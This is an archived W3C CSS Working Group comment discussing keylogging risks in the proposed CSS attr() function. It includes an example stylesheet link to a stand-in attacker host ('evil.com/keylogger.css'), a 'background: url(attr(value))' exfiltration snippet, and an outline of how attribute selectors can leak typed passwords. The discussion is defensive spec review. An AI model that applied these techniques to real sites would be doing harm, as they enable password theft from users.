
Re: [csswg-drafts] [css-values] Keylogging concerns for attr() value

From: Xidorn Quan via GitHub <sysbot+gh@w3.org>
Date: Thu, 22 Feb 2018 00:30:44 +0000
To: public-css-archive@w3.org
Message-ID: <issue_comment.created-367525977-1519259443-sysbot+gh@w3.org>

> attr() can't be used for anything nefarious today

Hmmm, if you can insert a sheet on a host you control, e.g. by inserting `<link rel="stylesheet" href="https://evil.com/keylogger.css">`, then you can get calls purely via `background: url(attr(value))` in it. That's probably harder in most cases, but who knows?

> But then again, we already know that allowing people to run arbitrary CSS on your site is an XSS vector. It takes a little more effort than just running arbitrary script, but there have been several reasonable POCs written over the years.

It's a bit surprising to me. I didn't think CSS could be used for XSS... Have we put anything about this in the CSS spec somehow?

> Weak password exfiltration might be reasonable, particularly since using a combination of `^=` and `$=` lets you cut the exponent in half, and using `*=` gives you the set of characters used.

It's more than that, really. If you type the password, `$=` would record almost the whole password string as you type. It has pitfalls, e.g. it cannot record repeated characters, and it wouldn't work if you use arrow keys etc. to insert characters before the cursor. But yeah, it's reasonable enough to shrink the search space significantly.

-- 
GitHub Notification of comment by upsuper
Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/2339#issuecomment-367525977 using your GitHub account
Received on Thursday, 22 February 2018 00:30:47 UTC